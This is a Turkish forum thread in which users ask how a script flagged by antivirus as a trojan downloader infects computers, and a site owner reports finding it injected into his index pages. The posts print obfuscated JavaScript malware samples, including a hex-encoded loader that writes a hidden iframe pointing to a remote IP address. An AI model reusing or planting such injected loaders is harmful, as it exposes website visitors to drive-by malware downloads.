Bu kodlar trojan down ediyormuş ama nerden nasıl?

[frozsgy]

Bir siteye girdiğimde NOD32 trojan uyarısı verdi ve engellettim. O adrese girince firefoxla bir js odu gördüm ve de kodu aldım. Bu kod nasıl bir trojan bulaştırabilir?

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,58,26,30,6,55,12,24,62,4,0,0,0,0,0,0,0,38,59,56,46,45,34,13,35,15,50,20,19,47,7,5,28,
54,23,22,17,9,16,60,52,43,2,0,0,0,0,40,0,14,33,42,18,10,25,29,53,44,31,41,39,48,36,37,11,
27,49,3,32,51,21,61,1,8,57);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,B);i>0;i--,l--)
{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;
s-=2}else{s=6}}document.write(u)}}dc("Zs")</script>[/CODE]

Kodun adı JS/TrojanDownloader.Psyme.CZ.Gen

[Pesimist]

Tam olarak bilmiyorum ama bir yorum yapayim bu numaralarin arka planı aslinda bir yazi yani bir kodlama bu kodlamanin aslıda bir trojen bu yorumu neye dayanarak yaptım derseniz eger linklerden msnler çaliniyordu o yollardan msn adresini kod yani sayilara dokerek link yapiliyordu ve msn çaliniyordu onu göz onunde bulundururarak bir yorum yaptim....[Yanlış olabilir.]

[Zeroo]

Bir siteye girdiğimde NOD32 trojan uyarısı verdi ve engellettim. O adrese girince firefoxla bir js odu gördüm ve de kodu aldım. Bu kod nasıl bir trojan bulaştırabilir?

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,58,26,30,6,55,12,24,62,4,0,0,0,0,0,0,0,38,59,56,46,45,34,13,35,15,50,20,1
9,47,7,5,28,
54,23,22,17,9,16,60,52,43,2,0,0,0,0,40,0,14,33,42,18,10,25,29,53,44,31,41,39,48,
36,37,11,
27,49,3,32,51,21,61,1,8,57);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,B);i>0;i--,l--)
{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;
s-=2}else{s=6}}document.write(u)}}dc("Zs")</script>[/CODE]

Kodun adı JS/TrojanDownloader.Psyme.CZ.Gen

Yaaa bugün bende de aynısı oldu Nod32 engelledi ama silemiyormuş.Çok korkuyorum :'( Bilgisayarına herhangi bir zararı oldu mu?Nasıl birşeymiş bu trojan biliyor musun?Ne gibi zararlar verirmiş?

[TeksasStyLe]

girdiğiniz site hangisi bizde kaspersky ile girelim bakalım .

[zafercan]

selamlar;

nod32 benim kendi sitemde << JS/TrojanDownloader.Psyme.CZ.Gen truva atı >> diye bir virüs gösterdi bnde ftp deki hemen hemen tüm index dosyalarının hepsinde arama yaptım yaklaşık 10-12 adet aşağıda verdiğim kodları buldum ve imha ettim ama ne yazıki halen forumlara girdiğimde yine aynı virüsün uyarısını görüyorum ne yapmam lazım biraz yardımcı olurmusunuz.

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47ab57864b55c(v47ab57864b956){ function v47ab57864bd52 () {var v47ab57864c151=16; return v47ab57864c151;} return(parseInt(v47ab57864b956,v47ab57864bd52()));}function v47ab57864c54d(v47ab57864c947){ var v47ab57864d540=2; var v47ab57864cd47='';for(v47ab57864d158=0; v47ab57864d158<v47ab57864c947.length; v47ab57864d158+=v47ab57864d540){ v47ab57864cd47+=(String.fromCharCode(v47ab57864b55c(v47ab57864c947.substr(v47ab57864d158, v47ab57864d540))));}return v47ab57864cd47;} document.write(v47ab57864c54d('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E
777269746528273C696672616D65206E616D653D65363638306531393233207372633D5C276874747
03A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F75
6E64284D6174682E72616E646F6D28292A333433323030292B2765365C272077696474683D3635302
06865696768743D353238207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672
616D653E27293C2F5343524950543E'));</script>[/CODE]